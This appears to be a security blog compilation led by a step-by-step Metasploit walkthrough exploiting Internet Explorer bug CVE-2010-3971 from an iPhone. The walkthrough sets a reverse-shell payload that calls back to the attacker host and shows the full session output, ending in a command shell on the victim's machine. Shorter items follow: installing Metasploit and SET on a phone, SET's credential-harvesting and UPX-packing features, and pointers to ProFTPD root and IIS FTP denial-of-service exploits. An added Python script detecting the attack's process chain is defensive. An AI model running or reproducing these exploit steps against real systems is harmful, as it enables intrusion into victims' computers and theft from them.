Exploiting Windows 7 - Internet Explorer 0-day CVE-2010-3971 with Metasploit from an iPhone 4

Exploitable over 3G or Wi-Fi.
Also valid for Metasploit on Windows, Linux and Mac OS X.

Description of the vulnerability:

CVE-2010-3971
Use-after-free vulnerability in the CSharedStyleSheet::Notify function of the Cascading Style Sheets (CSS) parser in mshtml.dll, as used in Microsoft Internet Explorer 6 through 8 and probably other products, allows remote attackers to cause a denial of service (crash) and execute arbitrary code via multiple @import calls in a crafted document.
Several public exploits exist, but I will use Metasploit for this example.
Metasploit module used: ms11_xxx_ie_css_import. At the time of writing Microsoft had not yet published a bulletin for this bug, hence the "xxx" placeholder; after the February 2011 fix (MS11-003) the module was renamed ms11_003_ie_css_import.

msf > use exploit/windows/browser/ms11_xxx_ie_css_import
msf exploit(ms11_xxx_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms11_xxx_ie_css_import) > set SRVHOST 172.16.0.101
SRVHOST => 172.16.0.101
msf exploit(ms11_xxx_ie_css_import) > set LHOST 172.16.0.101
LHOST => 172.16.0.101
msf exploit(ms11_xxx_ie_css_import) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 172.16.0.101:4444
[*] Using URL: http://172.16.0.101:8080/gbWbMzi4

Description

- Select the exploit to use
use exploit/windows/browser/ms11_xxx_ie_css_import
- Select the payload
set PAYLOAD windows/meterpreter/reverse_tcp
- Set the address the exploit's web server binds to (in this case our iPhone)
set SRVHOST 172.16.0.101
- Set the IP address the victim will connect back to, which is embedded in the reverse payload (in this case our iPhone)
set LHOST 172.16.0.101
- Run the exploit
exploit

Both the web server port (8080) and the handler port (4444) must be reachable from the victim's network. Over 3G that is only the case if the phone has an address the victim can actually route to, so check this before blaming the exploit.

Metasploit will generate a malicious URL:

[*] Exploit running as background job.

[*] Started reverse handler on 172.16.0.101:4444
[*] Using URL: http://172.16.0.101:8080/gbWbMzi4
[*] Server started.

http://172.16.0.101:8080/gbWbMzi4

The victim must open that URL in Internet Explorer. There are several ways to achieve this, but I will not go into details.

When the victim opens the URL, output similar to the following appears in msfconsole:

msf exploit(ms11_xxx_ie_css_import) > [*] 172.16.0.101:53759 Received request for "/gbWbMzi4"
[*] 172.16.0.101:53759 Sending windows/browser/ms11_xxx_ie_css_import redirect
[*] 172.16.0.101:53759 Received request for "/gbWbMzi4/sa1Ck.html"
[*] 172.16.0.101:53759 Sending windows/browser/ms11_xxx_ie_css_import HTML
[*] 172.16.0.101:53759 Received request for "/gbWbMzi4/generic-1294064502.dll"
[*] 172.16.0.101:53759 Sending windows/browser/ms11_xxx_ie_css_import .NET DLL
[*] 172.16.0.101:53761 Received request for "/gbWbMzi4/\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A\xEE\x80\xA0\xE1\x81\x9A"
[*] 172.16.0.101:53761 Sending windows/browser/ms11_xxx_ie_css_import CSS
[*] Sending stage (749056 bytes) to 172.16.0.101
[*] Meterpreter session 1 opened (172.16.0.101:4444 -> 172.16.0.101:53762) at 2011-01-03 15:21:47 +0100
[*] Session ID 1 (172.16.0.101:4444 -> 172.16.0.101:53762) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2320)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 2492
[*] New server process: notepad.exe (2492)

Interact with the session:
msf exploit(ms11_xxx_ie_css_import) > sessions -i 1

Get a command shell on the victim (it runs with the privileges of the user who opened the page, here Tester, not as SYSTEM):
meterpreter > execute -f cmd.exe -H -i

Process 2544 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\Tester\Desktop>
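The Meterpreter output above leaves a process-tree footprint a defender can look for: iexplore.exe (PID 2320) spawns notepad.exe (PID 2492), the Meterpreter migrated into notepad.exe holds the reverse connection to 172.16.0.101:4444, and `execute -f cmd.exe` then makes notepad.exe the parent of cmd.exe (PID 2544). The following detection script is an added example and is not code from the original post or from Metasploit. It runs over a constructed list of Sysmon-style ProcessCreate/NetworkConnect events that mirror that sequence: the PIDs 2320, 2492 and 2544 come from the log above, while the parent PIDs, the benign notepad.exe started from explorer.exe, the browser request to port 8080 and the allow-lists are assumptions made for the example.

```python
"""Flag the browser -> notepad.exe -> reverse shell chain seen in the
Meterpreter log above. Input is a list of Sysmon-like events constructed
for this example, not real telemetry."""

BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe"}
# Children a browser may legitimately start (IE8 runs tabs as child iexplore.exe).
BROWSER_HELPERS = {"iexplore.exe"}
# Images that never need an outbound connection (assumed allow-list).
NO_NETWORK_IMAGES = {"notepad.exe", "calc.exe", "mspaint.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

# Constructed events: PIDs 2320, 2492 and 2544 are taken from the log above;
# parent PIDs, the benign notepad.exe (2400) and the port-8080 request are
# assumptions for the example.
EVENTS = [
    {"type": "ProcessCreate", "pid": 1100, "image": "explorer.exe",
     "ppid": 900, "parent_image": "winlogon.exe"},
    {"type": "ProcessCreate", "pid": 2320, "image": "iexplore.exe",
     "ppid": 1100, "parent_image": "explorer.exe"},
    {"type": "NetworkConnect", "pid": 2320, "image": "iexplore.exe",
     "dst": "172.16.0.101", "dport": 8080},          # fetching the exploit page
    {"type": "ProcessCreate", "pid": 2400, "image": "notepad.exe",
     "ppid": 1100, "parent_image": "explorer.exe"},  # user-started, benign
    {"type": "ProcessCreate", "pid": 2492, "image": "notepad.exe",
     "ppid": 2320, "parent_image": "iexplore.exe"},  # "Spawning a notepad.exe host process"
    {"type": "NetworkConnect", "pid": 2492, "image": "notepad.exe",
     "dst": "172.16.0.101", "dport": 4444},          # migrated Meterpreter keeps the session
    {"type": "ProcessCreate", "pid": 2544, "image": "cmd.exe",
     "ppid": 2492, "parent_image": "notepad.exe"},   # execute -f cmd.exe -H -i
]


def has_browser_ancestor(pid, parent_of, max_depth=32):
    """Walk the recorded parent chain from pid; True if any ancestor is a browser."""
    for _ in range(max_depth):  # bounded so PID reuse cannot loop forever
        if pid not in parent_of:
            return False
        ppid, parent_image = parent_of[pid]
        if parent_image in BROWSERS:
            return True
        pid = ppid
    return False


def detect(events):
    """Return (rule, pid) alerts in the order the triggering events arrive."""
    alerts = []
    parent_of = {}            # pid -> (ppid, parent image), from ProcessCreate events
    browser_children = set()  # pids spawned directly by a browser
    for ev in events:
        pid, image = ev["pid"], ev["image"].lower()
        if ev["type"] == "ProcessCreate":
            parent_image = ev["parent_image"].lower()
            parent_of[pid] = (ev["ppid"], parent_image)
            # Rule 1: a browser starting something other than its own helpers.
            if parent_image in BROWSERS and image not in BROWSER_HELPERS:
                browser_children.add(pid)
                alerts.append(("browser_spawned_unexpected_child", pid))
            # Rule 3: a command shell whose ancestry leads back to a browser.
            if image in SHELLS and has_browser_ancestor(pid, parent_of):
                alerts.append(("shell_descends_from_browser", pid))
        elif ev["type"] == "NetworkConnect":
            # Rule 2: an image that never needs the network connects out; when a
            # browser spawned it, this is the "migrate -f" footprint from the log.
            if image in NO_NETWORK_IMAGES:
                rule = ("browser_child_connects_out" if pid in browser_children
                        else "no_network_image_connects_out")
                alerts.append((rule, pid))
    return alerts


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule}: pid {pid}")
```

Run as a script it prints three alerts for the constructed sequence, all tied to PIDs 2492 and 2544; the user-started notepad.exe (2400) produces none. The parent link is what makes the second rule precise: `migrate -f` always spawns a fresh host process under the exploited browser, whereas a plain `migrate <pid>` into an existing process leaves no such child, so the broad first rule (browser spawning an unexpected child) is the one to keep even if the network rule has to be tuned per environment.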

Installing Metasploit 3.5.1+ and SET on an iPhone 4

Via SSH

#MSF3

apt-get install subversion nano wget python
cd /private/var/
wget http://apt.saurik.com/cydia/debs/ruby_1.8.6-p111-5_iphoneos-arm.deb
dpkg -i ruby_1.8.6-p111-5_iphoneos-arm.deb
apt-get install rubygems
wget http://updates.metasploit.com/data/releases/framework-3.5.1.tar.bz2
tar jxpf framework-3.5.1.tar.bz2
cd msf3
./msfconsole


#SET

cd /private/var/
svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/
cd SET
./set #Accept the installation of any Python modules it asks for.

Note: do not upgrade ruby. This Metasploit release only works with the ruby 1.8.6-p111-5 package installed above, and a newer ruby from Cydia breaks the installation; mark the package as held in dpkg before running any apt-get upgrade.

Social-Engineer Toolkit (SET) v1.1 Released


SET v1.1 Codename: “Happy Holidays” Released

This release adds new Metasploit-based client-side attacks (4 in total), many optimizations on the SET web server including proper threading to make it run faster as well as an overhaul of optimizations through the entire code base. The next version 1.2 will be an overhaul of function calls and centralization of modules to allow easier additions for third party contributions.

Also added in this release is a new set_config option that will automatically disable the auto redirection on the Java Applet so in examples with Multi-Attack where you use Java Applet + Credential Harvester it will now only redirect once the credential harvester is executed. This is especially useful when you get your payload execution and harvest credentials all within one attack.

Lastly, another great option is I've added UPX support for the Java Applet and Payload Generator attacks. In the set_config is a new option called "UPX_ENCODE=ON", this is on by default and checks to see if UPX is in the default Back|Track path. If it's not it will automatically disable the UPX packing, otherwise it will automatically pack the executable with the UPX packer. You can turn this off in the set_config by specifying UPX_ENCODE=OFF. Enjoy the latest version of SET, there is more to come with the next 1.2 release which is currently under development.

ProFTPD with mod_sql pre-authentication, remote root



This paper describes and explores a pre-authentication remote root heap overflow in the ProFTPD [1] FTP server. It's not quite a standard overflow, due to how the ProFTPD heap works, and how the bug is exploited via variable substitution. The vulnerability was inadvertently mitigated (from remote root, at least :( ) when the ProFTPD developers fixed a separate vulnerability in mod_sql where you could inject SQL and bypass authentication. That vulnerability that mitigated it is documented in CVE-2009-0542. The specific vulnerability we are exploring is an unbounded copy operation in sql_prepare_where(), which has not been fixed yet. Also, I'd like to preemptively apologise for the attached code. It evolved over time in piecemeal fashion, and isn't overly pretty/readable by now.

Full Document and Exploit here

Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS PoC

The vulnerability allows an unauthenticated remote attacker to cause a denial of service of the IIS 7.5 FTP service on Windows 7. Proof-of-concept exploit here.

Metasploit Framework 3.5.1 Released

Versions 3.5.1 of the Metasploit Framework, Metasploit Express, and Metasploit Pro have gone live! This synchronized release adds 47 new modules and 8 new scripts since 3.5.0, bringing the total to 635 exploits, 314 auxiliary modules, and 215 payloads. Metasploit now provides additional exploits for SAP BusinessObjects, Exim mail servers, ProFTPD file transfer installations, SCADA deployments (BACnet, Citect, DATAC), Novell NetWare servers, Microsoft Internet Explorer, and browser plugins such as Adobe Flash and Oracle Java. Improvements have been made to the client-side Java exploits. The Meterpreter payload now supports webcam, microphone, and screen spying. Brute force modules support empty user names and now include the Unix "r" services, VNC, and SNMP protocols. The Nessus import plugin has been updated, basic support for nCircle has been added, and the framework can now export into the PWDump and John the Ripper formats.